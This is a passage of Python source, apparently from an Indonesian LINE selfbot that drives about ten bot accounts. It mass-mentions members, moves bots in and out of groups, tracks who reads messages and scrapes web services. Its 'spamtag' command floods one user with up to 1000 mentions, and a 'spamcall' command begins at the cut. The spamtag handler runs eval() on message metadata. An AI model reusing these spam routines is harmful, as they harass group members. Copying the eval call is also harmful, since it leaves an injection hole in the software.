for k in range (40, 59):
nm3 += [nama[k]]
mentionMembers(msg.to, nm3)
for l in range (60, 79):
nm4 += [nama[l]]
mentionMembers(msg.to, nm4)
for m in range (80, 99):
nm5 += [nama[m]]
mentionMembers(msg.to, nm5)
for n in range (100, 119):
nm6 += [nama[n]]
mentionMembers(msg.to, nm6)
for o in range (120, 139):
nm7 += [nama[o]]
mentionMembers(msg.to, nm7)
for p in range (140, 159):
nm8 += [nama[p]]
mentionMembers(msg.to, nm8)
for q in range (160, 179):
nm9 += [nama[q]]
mentionMembers(msg.to, nm9)
for r in range (180, 199):
nm10 += [nama[r]]
mentionMembers(msg.to, nm10)
for s in range (200, 219):
nm11 += [nama[s]]
mentionMembers(msg.to, nm11)
for t in range (220, 239):
nm12 += [nama[t]]
mentionMembers(msg.to, nm12)
for u in range (240, len(nama)-1):
nm13 += [nama[u]]
mentionMembers(msg.to, nm13)
if jml > 240 and jml < 259:
for i in range (0, 19):
nm1 += [nama[i]]
mentionMembers(msg.to, nm1)
for j in range (20, 39):
nm2 += [nama[j]]
mentionMembers(msg.to, nm2)
for k in range (40, 59):
nm3 += [nama[k]]
mentionMembers(msg.to, nm3)
for l in range (60, 79):
nm4 += [nama[l]]
mentionMembers(msg.to, nm4)
for m in range (80, 99):
nm5 += [nama[m]]
mentionMembers(msg.to, nm5)
for n in range (100, 119):
nm6 += [nama[n]]
mentionMembers(msg.to, nm6)
for o in range (120, 139):
nm7 += [nama[o]]
mentionMembers(msg.to, nm7)
for p in range (140, 159):
nm8 += [nama[p]]
mentionMembers(msg.to, nm8)
for q in range (160, 179):
nm9 += [nama[q]]
mentionMembers(msg.to, nm9)
for r in range (180, 199):
nm10 += [nama[r]]
mentionMembers(msg.to, nm10)
for s in range (200, 219):
nm11 += [nama[s]]
mentionMembers(msg.to, nm11)
for t in range (220, 239):
nm12 += [nama[t]]
mentionMembers(msg.to, nm12)
for u in range (240, 259):
nm13 += [nama[u]]
mentionMembers(msg.to, nm13)
for v in range (260, len(nama)-1):
nm14 += [nama[v]]
mentionMembers(msg.to, nm14)
if jml > 260 and jml < 279:
for i in range (0, 19):
nm1 += [nama[i]]
mentionMembers(msg.to, nm1)
for j in range (20, 39):
nm2 += [nama[j]]
mentionMembers(msg.to, nm2)
for k in range (40, 59):
nm3 += [nama[k]]
mentionMembers(msg.to, nm3)
for l in range (60, 79):
nm4 += [nama[l]]
mentionMembers(msg.to, nm4)
for m in range (80, 99):
nm5 += [nama[m]]
mentionMembers(msg.to, nm5)
for n in range (100, 119):
nm6 += [nama[n]]
mentionMembers(msg.to, nm6)
for o in range (120, 139):
nm7 += [nama[o]]
mentionMembers(msg.to, nm7)
for p in range (140, 159):
nm8 += [nama[p]]
mentionMembers(msg.to, nm8)
for q in range (160, 179):
nm9 += [nama[q]]
mentionMembers(msg.to, nm9)
for r in range (180, 199):
nm10 += [nama[r]]
mentionMembers(msg.to, nm10)
for s in range (200, 219):
nm11 += [nama[s]]
mentionMembers(msg.to, nm11)
for t in range (220, 239):
nm12 += [nama[t]]
mentionMembers(msg.to, nm12)
for u in range (240, 259):
nm13 += [nama[u]]
mentionMembers(msg.to, nm13)
for v in range (260, 279):
nm14 += [nama[v]]
mentionMembers(msg.to, nm14)
for w in range (280, len(nama)-1):
nm15 += [nama[w]]
mentionMembers(msg.to, nm15)
if jml > 280 and jml < 299:
for i in range (0, 19):
nm1 += [nama[i]]
mentionMembers(msg.to, nm1)
for j in range (20, 39):
nm2 += [nama[j]]
mentionMembers(msg.to, nm2)
for k in range (40, 59):
nm3 += [nama[k]]
mentionMembers(msg.to, nm3)
for l in range (60, 79):
nm4 += [nama[l]]
mentionMembers(msg.to, nm4)
for m in range (80, 99):
nm5 += [nama[m]]
mentionMembers(msg.to, nm5)
for n in range (100, 119):
nm6 += [nama[n]]
mentionMembers(msg.to, nm6)
for o in range (120, 139):
nm7 += [nama[o]]
mentionMembers(msg.to, nm7)
for p in range (140, 159):
nm8 += [nama[p]]
mentionMembers(msg.to, nm8)
for q in range (160, 179):
nm9 += [nama[q]]
mentionMembers(msg.to, nm9)
for r in range (180, 199):
nm10 += [nama[r]]
mentionMembers(msg.to, nm10)
for s in range (200, 219):
nm11 += [nama[s]]
mentionMembers(msg.to, nm11)
for t in range (220, 239):
nm12 += [nama[t]]
mentionMembers(msg.to, nm12)
for u in range (240, 259):
nm13 += [nama[u]]
mentionMembers(msg.to, nm13)
for v in range (260, 279):
nm14 += [nama[v]]
mentionMembers(msg.to, nm14)
for w in range (280, 299):
nm15 += [nama[w]]
mentionMembers(msg.to, nm15)
for x in range (300, len(nama)-1):
nm16 += [nama[x]]
mentionMembers(msg.to, nm16)
elif cmd == "listbot":
if wait["selfbot"] == True:
if msg._from in admin:
ma = ""
a = 0
for m_id in Bots:
a = a + 1
end = '\n'
ma += str(a) + ". " +cl.getContact(m_id).displayName + "\n"
cl.sendMessage(msg.to,"Famz__botz\n\n"+ma+"\nTotalã%sã Bots" %(str(len(Bots))))
elif cmd == "listadmin":
if wait["selfbot"] == True:
if msg._from in admin:
ma = ""
mb = ""
mc = ""
a = 0
b = 0
c = 0
for m_id in owner:
a = a + 1
end = '\n'
ma += str(a) + ". " +cl.getContact(m_id).displayName + "\n"
for m_id in admin:
b = b + 1
end = '\n'
mb += str(b) + ". " +cl.getContact(m_id).displayName + "\n"
for m_id in staff:
c = c + 1
end = '\n'
mc += str(c) + ". " +cl.getContact(m_id).displayName + "\n"
cl.sendMessage(msg.to,"âââââ¦Daftar__Adminâ§âââ⺠\n\nSuper admin:\n"+ma+"\nAdmin:\n"+mb+"\nStaff:\n"+mc+"\nTotalã%sã Anggota" %(str(len(owner)+len(admin)+len(staff))))
elif cmd == "listprotect":
if wait["selfbot"] == True:
if msg._from in admin:
ma = ""
mb = ""
mc = ""
md = ""
me = ""
mf = ""
a = 0
gid = protectqr
for group in gid:
a = a + 1
end = '\n'
ma += str(a) + ". " +cl.getGroup(group).name + "\n"
gid = protectkick
for group in gid:
a = a + 1
end = '\n'
mb += str(a) + ". " +cl.getGroup(group).name + "\n"
gid = protectjoin
for group in gid:
a = a + 1
end = '\n'
md += str(a) + ". " +cl.getGroup(group).name + "\n"
gid = protectcancel
for group in gid:
a = a + 1
end = '\n'
mc += str(a) + ". " +cl.getGroup(group).name + "\n"
gid = protectinvite
for group in gid:
a = a + 1
end = '\n'
me += str(a) + ". " +cl.getGroup(group).name + "\n"
gid = protectantijs
for group in gid:
a = a + 1
end = '\n'
mf += str(a) + ". " +cl.getGroup(group).name + "\n"
cl.sendMessage(msg.to,"ãâââââ¦Famz_Protectionâ§ââââºã\n\nãâã PROTECT URL :\n"+ma+"\nãâã PROTECT KICK :\n"+mb+"\nãâã PROTECT JOIN :\n"+md+"\nãâã PROTECT CANCEL:\n"+mc+"\nãâã PROTECT INVITE:\n"+me+"\nãâã PROTECT ANTIJS :\n"+mf+"\nTotalã%sãGrup diamankan" %(str(len(protectqr)+len(protectkick)+len(protectjoin)+len(protectcancel)+len(protectinvite)+len(protectantijs))))
elif cmd == "respon":
if wait["selfbot"] == True:
if msg._from in admin:
ki.sendMessage(msg.to,responsename1)
kk.sendMessage(msg.to,responsename2)
kc.sendMessage(msg.to,responsename3)
km.sendMessage(msg.to,responsename4)
kb.sendMessage(msg.to,responsename5)
kn.sendMessage(msg.to,responsename6)
ko.sendMessage(msg.to,responsename7)
kw.sendMessage(msg.to,responsename8)
ke.sendMessage(msg.to,responsename9)
ky.sendMessage(msg.to,responsename10)
elif cmd == "invitebot":
if wait["selfbot"] == True:
if msg._from in admin:
try:
anggota = [Bmid,Cmid,Amid]
cl.inviteIntoGroup(msg.to, anggota)
ki.acceptGroupInvitation(msg.to)
kc.acceptGroupInvitation(msg.to)
except:
pass
elif cmd == "antijs stay":
if wait["selfbot"] == True:
if msg._from in admin:
try:
ginfo = cl.getGroup(msg.to)
cl.inviteIntoGroup(msg.to, [JSmid])
cl.sendMessage(msg.to,"Grup ã"+str(ginfo.name)+"ã Aman Dari JS")
except:
pass
elif cmd == "joinall":
if wait["selfbot"] == True:
if msg._from in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
kk.acceptGroupInvitationByTicket(msg.to,Ticket)
kc.acceptGroupInvitationByTicket(msg.to,Ticket)
km.acceptGroupInvitationByTicket(msg.to,Ticket)
kb.acceptGroupInvitationByTicket(msg.to,Ticket)
kn.acceptGroupInvitationByTicket(msg.to,Ticket)
ko.acceptGroupInvitationByTicket(msg.to,Ticket)
kw.acceptGroupInvitationByTicket(msg.to,Ticket)
ke.acceptGroupInvitationByTicket(msg.to,Ticket)
ky.acceptGroupInvitationByTicket(msg.to,Ticket)
G = ky.getGroup(msg.to)
G.preventedJoinByTicket = True
ky.updateGroup(G)
elif cmd == "byeall":
if wait["selfbot"] == True:
if msg._from in admin:
G = cl.getGroup(msg.to)
ki.sendText(msg.to, "Bye bye fams "+str(G.name))
ki.leaveGroup(msg.to)
kk.leaveGroup(msg.to)
kc.leaveGroup(msg.to)
km.leaveGroup(msg.to)
kb.leaveGroup(msg.to)
kn.leaveGroup(msg.to)
ko.leaveGroup(msg.to)
kw.leaveGroup(msg.to)
ke.leaveGroup(msg.to)
ky.leaveGroup(msg.to)
elif cmd == "byeme":
if wait["selfbot"] == True:
if msg._from in admin:
G = cl.getGroup(msg.to)
cl.sendText(msg.to, "Bye bye fams "+str(G.name))
cl.leaveGroup(msg.to)
elif cmd.startswith("leave "):
if msg._from in admin:
proses = text.split(" ")
ng = text.replace(proses[0] + " ","")
gid = cl.getGroupIdsJoined()
for i in gid:
h = cl.getGroup(i).name
if h == ng:
ki.sendMessage(i, "Silahkan admin invite atau masukan kembali")
ki.leaveGroup(i)
kk.leaveGroup(i)
kc.leaveGroup(i)
km.leaveGroup(i)
kb.leaveGroup(i)
kn.leaveGroup(i)
ko.leaveGroup(i)
kw.leaveGroup(i)
ke.leaveGroup(i)
ky.leaveGroup(i)
cl.sendMessage(to,"Berhasil keluar dari grup " +h)
elif cmd == "assist1":
if msg._from in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
G = ki.getGroup(msg.to)
G.preventedJoinByTicket = True
ki.updateGroup(G)
elif cmd == "assist2":
if msg._from in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
kk.acceptGroupInvitationByTicket(msg.to,Ticket)
G = kk.getGroup(msg.to)
G.preventedJoinByTicket = True
kk.updateGroup(G)
elif cmd == "assist3":
if msg._from in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
kc.acceptGroupInvitationByTicket(msg.to,Ticket)
G = kc.getGroup(msg.to)
G.preventedJoinByTicket = True
kc.updateGroup(G)
elif cmd == "assist4":
if msg._from in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
km.acceptGroupInvitationByTicket(msg.to,Ticket)
G = km.getGroup(msg.to)
G.preventedJoinByTicket = True
km.updateGroup(G)
elif cmd == "assist5":
if msg._from in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
kb.acceptGroupInvitationByTicket(msg.to,Ticket)
G = kb.getGroup(msg.to)
G.preventedJoinByTicket = True
kb.updateGroup(G)
elif cmd == "assist6":
if msg._from in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
kn.acceptGroupInvitationByTicket(msg.to,Ticket)
G = kn.getGroup(msg.to)
G.preventedJoinByTicket = True
kn.updateGroup(G)
elif cmd == "assist7":
if msg._from in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ko.acceptGroupInvitationByTicket(msg.to,Ticket)
G = ko.getGroup(msg.to)
G.preventedJoinByTicket = True
ko.updateGroup(G)
elif cmd == "assist8":
if msg._from in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
kw.acceptGroupInvitationByTicket(msg.to,Ticket)
G = kw.getGroup(msg.to)
G.preventedJoinByTicket = True
kw.updateGroup(G)
elif cmd == "assist9":
if msg._from in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ke.acceptGroupInvitationByTicket(msg.to,Ticket)
G = ke.getGroup(msg.to)
G.preventedJoinByTicket = True
ke.updateGroup(G)
elif cmd == "assist10":
if msg._from in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ky.acceptGroupInvitationByTicket(msg.to,Ticket)
G = ky.getGroup(msg.to)
G.preventedJoinByTicket = True
ky.updateGroup(G)
elif cmd == "ghost join":
if msg._from in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
sw.acceptGroupInvitationByTicket(msg.to,Ticket)
sx.acceptGroupInvitationByTicket(msg.to,Ticket)
js.acceptGroupInvitationByTicket(msg.to,Ticket)
G = js.getGroup(msg.to)
G.preventedJoinByTicket = True
js.updateGroup(G)
elif cmd == "ghost bye":
if msg._from in admin:
G = cl.getGroup(msg.to)
sw.leaveGroup(msg.to)
sx.leaveGroup(msg.to)
js.leaveGroup(msg.to)
elif cmd == "sprespon":
if wait["selfbot"] == True:
if msg._from in admin:
get_profile_time_start = time.time()
get_profile = cl.getProfile()
get_profile_time = time.time() - get_profile_time_start
get_group_time_start = time.time()
get_group = cl.getGroupIdsJoined()
get_group_time = time.time() - get_group_time_start
get_contact_time_start = time.time()
get_contact = cl.getContact(mid)
get_contact_time = time.time() - get_contact_time_start
cl.sendMessage(msg.to, "Speed respon\n\n - Get Profile\n %.10f\n - Get Contact\n %.10f\n - Get Group\n %.10f" % (get_profile_time/3,get_contact_time/3,get_group_time/3))
elif cmd == "speed" or cmd == "sp":
if wait["selfbot"] == True:
if msg._from in admin:
start = time.time()
cl.sendMessage(msg.to, "ngebut bozzz...")
elapsed_time = time.time() - start
cl.sendMessage(msg.to, "{} detik".format(str(elapsed_time)))
elif cmd == "lurking on":
if wait["selfbot"] == True:
if msg._from in admin:
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
Setmain['ARreadPoint'][msg.to] = msg_id
Setmain['ARreadMember'][msg.to] = {}
cl.sendText(msg.to, "Lurking berhasil diaktifkan\n\nTanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')+"\nJam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]")
elif cmd == "lurking off":
if wait["selfbot"] == True:
if msg._from in admin:
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
del Setmain['ARreadPoint'][msg.to]
del Setmain['ARreadMember'][msg.to]
cl.sendText(msg.to, "Lurking berhasil dinoaktifkan\n\nTanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')+"\nJam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]")
elif cmd == "lurkers":
if msg._from in admin:
if msg.to in Setmain['ARreadPoint']:
if Setmain['ARreadMember'][msg.to] != {}:
aa = []
for x in Setmain['ARreadMember'][msg.to]:
aa.append(x)
try:
arrData = ""
textx = " [ Result {} member ] \n\n [ Lurkers ]\n1. ".format(str(len(aa)))
arr = []
no = 1
b = 1
for i in aa:
b = b + 1
end = "\n"
mention = "@x\n"
slen = str(len(textx))
elen = str(len(textx) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':i}
arr.append(arrData)
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
textx += mention
if no < len(aa):
no += 1
textx += str(b) + ". "
else:
try:
no = "[ {} ]".format(str(cl.getGroup(msg.to).name))
except:
no = " "
msg.to = msg.to
msg.text = textx+"\nTanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')+"\nJam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]"
msg.contentMetadata = {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}
msg.contentType = 0
cl.sendMessage1(msg)
except:
pass
try:
del Setmain['ARreadPoint'][msg.to]
del Setmain['ARreadMember'][msg.to]
except:
pass
Setmain['ARreadPoint'][msg.to] = msg.id
Setmain['ARreadMember'][msg.to] = {}
else:
cl.sendText(msg.to, "User kosong...")
else:
cl.sendText(msg.to, "Ketik lurking on dulu")
elif cmd == "sider on":
if wait["selfbot"] == True:
if msg._from in admin:
try:
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
cl.sendMessage(msg.to, "Cek sider diaktifkan\n\nTanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')+"\nJam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]")
del cctv['point'][msg.to]
del cctv['sidermem'][msg.to]
del cctv['cyduk'][msg.to]
except:
pass
cctv['point'][msg.to] = msg.id
cctv['sidermem'][msg.to] = ""
cctv['cyduk'][msg.to]=True
elif cmd == "sider off":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.to in cctv['point']:
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
cctv['cyduk'][msg.to]=False
cl.sendMessage(msg.to, "Cek sider dinonaktifkan\n\nTanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')+"\nJam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]")
else:
cl.sendMessage(msg.to, "Sudak tidak aktif")
#===========Hiburan============#
elif cmd.startswith("sholat: "):
if msg._from in admin:
sep = text.split(" ")
location = text.replace(sep[0] + " ","")
with requests.session() as web:
web.headers["user-agent"] = random.choice(settings["userAgent"])
r = web.get("http://api.corrykalam.net/apisholat.php?lokasi={}".format(urllib.parse.quote(location)))
data = r.text
data = json.loads(data)
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
if data[1] != "Subuh : " and data[2] != "Dzuhur : " and data[3] != "Ashar : " and data[4] != "Maghrib : " and data[5] != "Isha : ":
ret_ = "ãJadwal Sholatã"
ret_ += "\nâ§Lokasi : " + data[0]
ret_ += "\nâ§" + data[1]
ret_ += "\nâ§" + data[2]
ret_ += "\nâ§" + data[3]
ret_ += "\nâ§" + data[4]
ret_ += "\nâ§" + data[5]
ret_ += "\n\nTanggal : " + datetime.strftime(timeNow,'%Y-%m-%d')
ret_ += "\nJam : " + datetime.strftime(timeNow,'%H:%M:%S')
cl.sendMessage(msg.to, str(ret_))
elif cmd.startswith("cuaca: "):
if msg._from in admin:
separate = text.split(" ")
location = text.replace(separate[0] + " ","")
with requests.session() as web:
web.headers["user-agent"] = random.choice(settings["userAgent"])
r = web.get("http://api.corrykalam.net/apicuaca.php?kota={}".format(urllib.parse.quote(location)))
data = r.text
data = json.loads(data)
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
if "result" not in data:
ret_ = "ãStatus Cuacaã"
ret_ += "\nâ§Lokasi : " + data[0].replace("Temperatur di kota ","")
ret_ += "\nâ§Suhu : " + data[1].replace("Suhu : ","") + " C"
ret_ += "\nâ§Kelembaban : " + data[2].replace("Kelembaban : ","") + " %"
ret_ += "\nâ§Tekanan udara : " + data[3].replace("Tekanan udara : ","") + " HPa"
ret_ += "\nâ§Kecepatan angin : " + data[4].replace("Kecepatan angin : ","") + " m/s"
ret_ += "\n\nTanggal : " + datetime.strftime(timeNow,'%Y-%m-%d')
ret_ += "\nJam : " + datetime.strftime(timeNow,'%H:%M:%S')
cl.sendMessage(msg.to, str(ret_))
elif cmd.startswith("lokasi: "):
if msg._from in admin:
separate = msg.text.split(" ")
location = msg.text.replace(separate[0] + " ","")
with requests.session() as web:
web.headers["user-agent"] = random.choice(settings["userAgent"])
r = web.get("http://api.corrykalam.net/apiloc.php?lokasi={}".format(urllib.parse.quote(location)))
data = r.text
data = json.loads(data)
if data[0] != "" and data[1] != "" and data[2] != "":
link = "https://www.google.co.id/maps/@{},{},15z".format(str(data[1]), str(data[2]))
ret_ = "ãInfo Lokasiã"
ret_ += "\nâ§Location : " + data[0]
ret_ += "\nâ§Google Maps : " + link
else:
ret_ = "[Details Location] Error : Location not found"
cl.sendMessage(msg.to,str(ret_))
elif cmd.startswith("lirik: "):
if msg._from in admin:
sep = msg.text.split(" ")
search = msg.text.replace(sep[0] + " ","")
params = {'songname': search}
with requests.session() as web:
web.headers["User-Agent"] = random.choice(settings["userAgent"])
r = web.get("https://ide.fdlrcn.com/workspace/yumi-apis/joox?{}".format(urllib.parse.urlencode(params)))
try:
data = json.loads(r.text)
for song in data:
songs = song[5]
lyric = songs.replace('ti:','Title - ')
lyric = lyric.replace('ar:','Artist - ')
lyric = lyric.replace('al:','Album - ')
removeString = "[1234567890.:]"
for char in removeString:
lyric = lyric.replace(char,'')
ret_ = "âââ[ Lyric ]"
ret_ += "\nâ Nama lagu : {}".format(str(song[0]))
ret_ += "\nâ Durasi : {}".format(str(song[1]))
ret_ += "\nâ Link : {}".format(str(song[3]))
ret_ += "\nâââ[ Finish ]\n\nLirik nya :\n{}".format(str(lyric))
cl.sendText(msg.to, str(ret_))
except:
cl.sendText(to, "Lirik tidak ditemukan")
elif cmd.startswith("music: "):
if msg._from in admin:
sep = msg.text.split(" ")
search = msg.text.replace(sep[0] + " ","")
params = {'songname': search}
with requests.session() as web:
web.headers["User-Agent"] = random.choice(settings["userAgent"])
r = web.get("https://ide.fdlrcn.com/workspace/yumi-apis/joox?{}".format(urllib.parse.urlencode(params)))
try:
data = json.loads(r.text)
for song in data:
ret_ = "âââ[ Music ]"
ret_ += "\nâ Nama lagu : {}".format(str(song[0]))
ret_ += "\nâ Durasi : {}".format(str(song[1]))
ret_ += "\nâ Link : {}".format(str(song[3]))
ret_ += "\nâââ[ Waiting Audio ]"
cl.sendText(msg.to, str(ret_))
cl.sendText(msg.to, "Mohon bersabar musicnya lagi di upload")
cl.sendAudioWithURL(msg.to, song[3])
except:
cl.sendText(to, "Musik tidak ditemukan")
elif cmd.startswith("gimage: "):
if msg._from in admin:
sep = msg.text.split(" ")
search = msg.text.replace(sep[0] + " ","")
url = "https://api.xeonwz.ga/api/image/google?q={}".format(urllib.parse.quote(search))
with requests.session() as web:
web.headers["User-Agent"] = random.choice(settings["userAgent"])
r = web.get(url)
data = r.text
data = json.loads(data)
if data["data"] != []:
start = timeit.timeit()
items = data["data"]
path = random.choice(items)
a = items.index(path)
b = len(items)
cl.sendText(msg.to,"ãGoogle Imageã\nType : Search Image\nTime taken : %seconds" % (start))
cl.sendImageWithURL(msg.to, str(path))
elif cmd.startswith("ytmp4: "):
if msg._from in admin:
try:
sep = msg.text.split(" ")
textToSearch = msg.text.replace(sep[0] + " ","")
query = urllib.parse.quote(textToSearch)
search_url="https://www.youtube.com/results?search_query="
mozhdr = {'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3'}
sb_url = search_url + query
sb_get = requests.get(sb_url, headers = mozhdr)
soupeddata = BeautifulSoup(sb_get.content, "html.parser")
yt_links = soupeddata.find_all("a", class_ = "yt-uix-tile-link")
x = (yt_links[1])
yt_href = x.get("href")
yt_href = yt_href.replace("watch?v=", "")
qx = "https://youtu.be" + str(yt_href)
vid = pafy.new(qx)
stream = vid.streams
best = vid.getbest()
best.resolution, best.extension
for s in stream:
me = best.url
hasil = ""
title = "Judul [ " + vid.title + " ]"
author = '\n\nâ§Author : ' + str(vid.author)
durasi = '\nâ§Duration : ' + str(vid.duration)
suka = '\nâ§Likes : ' + str(vid.likes)
rating = '\nâ§Rating : ' + str(vid.rating)
deskripsi = '\nâ§Deskripsi : ' + str(vid.description)
cl.sendVideoWithURL(msg.to, me)
cl.sendText(msg.to,title+ author+ durasi+ suka+ rating+ deskripsi)
except Exception as e:
cl.sendText(msg.to,str(e))
elif cmd.startswith("ytmp3: "):
if msg._from in admin:
try:
sep = msg.text.split(" ")
textToSearch = msg.text.replace(sep[0] + " ","")
query = urllib.parse.quote(textToSearch)
search_url="https://www.youtube.com/results?search_query="
mozhdr = {'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3'}
sb_url = search_url + query
sb_get = requests.get(sb_url, headers = mozhdr)
soupeddata = BeautifulSoup(sb_get.content, "html.parser")
yt_links = soupeddata.find_all("a", class_ = "yt-uix-tile-link")
x = (yt_links[1])
yt_href = x.get("href")
yt_href = yt_href.replace("watch?v=", "")
qx = "https://youtu.be" + str(yt_href)
vid = pafy.new(qx)
stream = vid.streams
bestaudio = vid.getbestaudio()
bestaudio.bitrate
best = vid.getbest()
best.resolution, best.extension
for s in stream:
shi = bestaudio.url
me = best.url
vin = s.url
hasil = ""
title = "Judul [ " + vid.title + " ]"
author = '\n\nâ§Author : ' + str(vid.author)
durasi = '\nâ§Duration : ' + str(vid.duration)
suka = '\nâ§Likes : ' + str(vid.likes)
rating = '\nâ§Rating : ' + str(vid.rating)
deskripsi = '\nâ§Deskripsi : ' + str(vid.description)
cl.sendImageWithURL(msg.to, me)
cl.sendAudioWithURL(msg.to, shi)
cl.sendText(msg.to,title+ author+ durasi+ suka+ rating+ deskripsi)
except Exception as e:
cl.sendText(msg.to,str(e))
elif cmd.startswith("profileig: "):
if msg._from in admin:
try:
sep = msg.text.split(" ")
instagram = msg.text.replace(sep[0] + " ","")
response = requests.get("https://www.instagram.com/"+instagram+"?__a=1")
data = response.json()
namaIG = str(data['user']['full_name'])
bioIG = str(data['user']['biography'])
mediaIG = str(data['user']['media']['count'])
verifIG = str(data['user']['is_verified'])
usernameIG = str(data['user']['username'])
followerIG = str(data['user']['followed_by']['count'])
profileIG = data['user']['profile_pic_url_hd']
privateIG = str(data['user']['is_private'])
followIG = str(data['user']['follows']['count'])
link = "â§Link : " + "https://www.instagram.com/" + instagram
text = "â§Name : "+namaIG+"\nâ§Username : "+usernameIG+"\nâ§Biography : "+bioIG+"\nâ§Follower : "+followerIG+"\nâ§Following : "+followIG+"\nâ§Post : "+mediaIG+"\nâ§Verified : "+verifIG+"\nâ§Private : "+privateIG+"" "\n" + link
cl.sendImageWithURL(msg.to, profileIG)
cl.sendMessage(msg.to, str(text))
except Exception as e:
cl.sendMessage(msg.to, str(e))
elif cmd.startswith("cekdate: "):
if msg._from in admin:
sep = msg.text.split(" ")
tanggal = msg.text.replace(sep[0] + " ","")
r=requests.get('https://script.google.com/macros/exec?service=AKfycbw7gKzP-WYV2F5mc9RaR7yE3Ve1yN91Tjs91hp_jHSE02dSv9w&nama=ervan&tanggal='+tanggal)
data=r.text
data=json.loads(data)
lahir = data["data"]["lahir"]
usia = data["data"]["usia"]
ultah = data["data"]["ultah"]
zodiak = data["data"]["zodiak"]
cl.sendMessage(msg.to,"â§I N F O R M A S I â§\n\n"+"â§Date Of Birth : "+lahir+"\nâ§Age : "+usia+"\nâ§Ultah : "+ultah+"\nâ§Zodiak : "+zodiak)
elif cmd.startswith("jumlah: "):
if wait["selfbot"] == True:
if msg._from in admin:
proses = text.split(":")
strnum = text.replace(proses[0] + ":","")
num = int(strnum)
Setmain["ARlimit"] = num
cl.sendText(msg.to,"Total Spamtag Diubah Menjadi " +strnum)
elif cmd.startswith("spamcall: "):
if wait["selfbot"] == True:
if msg._from in admin:
proses = text.split(":")
strnum = text.replace(proses[0] + ":","")
num = int(strnum)
wait["limit"] = num
cl.sendText(msg.to,"Total Spamcall Diubah Menjadi " +strnum)
elif cmd.startswith("spamtag "):
if wait["selfbot"] == True:
if msg._from in admin:
if 'MENTION' in msg.contentMetadata.keys()!=None:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
zx = ""
zxc = " "
zx2 = []
pesan2 = "@a"" "
xlen = str(len(zxc))
xlen2 = str(len(zxc)+len(pesan2)-1)
zx = {'S':xlen, 'E':xlen2, 'M':key1}
zx2.append(zx)
zxc += pesan2
msg.contentType = 0
msg.text = zxc
lol = {'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}
msg.contentMetadata = lol
jmlh = int(Setmain["ARlimit"])
if jmlh <= 1000:
for x in range(jmlh):
try:
cl.sendMessage1(msg)
except Exception as e:
cl.sendText(msg.to,str(e))
else:
cl.sendText(msg.to,"Jumlah melebihi 1000")
elif cmd == "spamcall":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.toType == 2:
group = cl.getGroup(to)
members = [mem.mid for mem in group.members]
